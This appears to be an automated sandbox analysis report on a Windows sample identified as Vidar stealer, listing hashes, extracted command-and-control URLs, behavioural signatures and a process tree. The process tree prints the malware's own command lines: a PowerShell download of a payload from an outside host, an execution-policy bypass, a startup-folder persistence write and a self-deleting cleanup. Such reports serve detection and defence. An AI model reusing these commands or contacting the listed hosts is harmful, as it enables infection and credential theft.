Analysis
-
max time kernel
94s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-11-2024 17:17
Static task
static1
Behavioral task
behavioral1
Sample
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe
Resource
win10v2004-20241007-en
General
-
Target
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe
-
Size
1.2MB
-
MD5
6a97f99224f349c28c6c4c8a3f2ecfb6
-
SHA1
64c0eac737f4f294e50d64d7ded5896e4d36b2e7
-
SHA256
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480
-
SHA512
370836b122778b34ac8804012781f1b1d274864977a537993b8efba9cc8d7f8b526d7ed9774d65a8311b556133f1c914a4f5d89421c4a4ee181278ddfd4639a0
-
SSDEEP
24576:0rORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvaj1h9XCrd:02EYTb8atv1orq+pEiSDTj1VyvBaJSR
Malware Config
Extracted
https://my.cloudme.com/v1/ws2/:excellent2024/:stars/stars.txt
Extracted
vidar
11.3
b0e0b58448bbda137aec170d966f8564
https://t.me/asg7rd
https://steamcommunity.com/profiles/76561199794498376
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
Signatures
-
Detect Vidar Stealer 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4348-51-0x0000000000400000-0x0000000000700000-memory.dmp family_vidar_v7 behavioral2/memory/4348-52-0x0000000000400000-0x0000000000700000-memory.dmp family_vidar_v7 behavioral2/memory/4348-48-0x0000000000400000-0x0000000000700000-memory.dmp family_vidar_v7 behavioral2/memory/4348-68-0x0000000000400000-0x0000000000700000-memory.dmp family_vidar_v7 behavioral2/memory/4348-69-0x0000000000400000-0x0000000000700000-memory.dmp family_vidar_v7 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
Guard.exedescription pid process target process PID 4472 created 3488 4472 Guard.exe Explorer.EXE PID 4472 created 3488 4472 Guard.exe Explorer.EXE -
Vidar family
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 7 3892 powershell.exe 19 1780 powershell.exe -
Processes:
powershell.exepowershell.exepid process 3892 powershell.exe 1780 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RegAsm.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
Guard.exejsc.exepid process 4472 Guard.exe 208 jsc.exe -
Loads dropped DLL 1 IoCs
Processes:
RegAsm.exepid process 4348 RegAsm.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
jsc.exedescription pid process target process PID 208 set thread context of 4348 208 jsc.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
jsc.exeRegAsm.execmd.exetimeout.exeGuard.execmd.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Guard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1172 timeout.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
powershell.exepowershell.exeGuard.exeRegAsm.exepid process 3892 powershell.exe 3892 powershell.exe 1780 powershell.exe 1780 powershell.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe 4348 RegAsm.exe 4348 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3892 powershell.exe Token: SeDebugPrivilege 1780 powershell.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exeGuard.exepid process 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe -
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exeGuard.exepid process 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe 4472 Guard.exe 4472 Guard.exe 4472 Guard.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exepowershell.exeGuard.exejsc.exeRegAsm.execmd.exedescription pid process target process PID 4812 wrote to memory of 3892 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe powershell.exe PID 4812 wrote to memory of 3892 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe powershell.exe PID 4812 wrote to memory of 1780 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe powershell.exe PID 4812 wrote to memory of 1780 4812 c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe powershell.exe PID 1780 wrote to memory of 4472 1780 powershell.exe Guard.exe PID 1780 wrote to memory of 4472 1780 powershell.exe Guard.exe PID 1780 wrote to memory of 4472 1780 powershell.exe Guard.exe PID 4472 wrote to memory of 1220 4472 Guard.exe cmd.exe PID 4472 wrote to memory of 1220 4472 Guard.exe cmd.exe PID 4472 wrote to memory of 1220 4472 Guard.exe cmd.exe PID 4472 wrote to memory of 208 4472 Guard.exe jsc.exe PID 4472 wrote to memory of 208 4472 Guard.exe jsc.exe PID 4472 wrote to memory of 208 4472 Guard.exe jsc.exe PID 4472 wrote to memory of 208 4472 Guard.exe jsc.exe PID 4472 wrote to memory of 208 4472 Guard.exe jsc.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 208 wrote to memory of 4348 208 jsc.exe RegAsm.exe PID 4348 wrote to memory of 628 4348 RegAsm.exe cmd.exe PID 4348 wrote to memory of 628 4348 RegAsm.exe cmd.exe PID 4348 wrote to memory of 628 4348 RegAsm.exe cmd.exe PID 628 wrote to memory of 1172 628 cmd.exe timeout.exe PID 628 wrote to memory of 1172 628 cmd.exe timeout.exe PID 628 wrote to memory of 1172 628 cmd.exe timeout.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3488
-
C:\Users\Admin\AppData\Local\Temp\c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe"C:\Users\Admin\AppData\Local\Temp\c61196d6b3ae9b0c88afb656c58adee79288de13927f288c767bacf2825e8480.exe"2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:excellent2024/:stars_1/stars" -OutFile "C:\Users\Public\Guard.exe""3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au34⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4472
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:1220
-
-
C:\Users\Public\jsc.exeC:\Users\Public\jsc.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Checks computer location settings
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4348 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\CGIDHIIJKEBG" & exit4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Windows\SysWOW64\timeout.exetimeout /t 105⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1172
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
676KB
MD5eda18948a989176f4eebb175ce806255
SHA1ff22a3d5f5fb705137f233c36622c79eab995897
SHA25681a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4
SHA512160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
872KB
MD518ce19b57f43ce0a5af149c96aecc685
SHA11bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558
-
Filesize
367B
MD565405b53d7734aba2bc7176af3bc406a
SHA13edc0caf6f9d845283b33c6362e2bf78b6792d5d
SHA256d63adba09c8936c086abe866006a0914716f66bbeebf08e20d63ea7ef8dca32b
SHA5127aeff31ef719dd751a734cb1fafbd58f05c987f959519e43ffecb3f5ddfb64982b5deb8b355021298d4beee07150b1d4bf55d73defc1a173cde526f3abb4a9c2
-
Filesize
4.4MB
MD51e388a35beee631c9e12d71e8bc79528
SHA177571813bff175b0fc88305f3b6c9e4adf7c9ac6
SHA2565ca0f2fd860b495bf2651853c1867e83b53643d06f4021c0e878a2682b2348e7
SHA51221e27f60ab65074f31aa2a6d8bab065a8d95de283dcb3a7fdb632682ba3a610b6b7637af2343ec2673a402ed7d821cfb9e1433ab1636716e3a8fb947b07fceb3
-
Filesize
46KB
MD594c8e57a80dfca2482dedb87b93d4fd9
SHA15729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA25639e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA5121798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc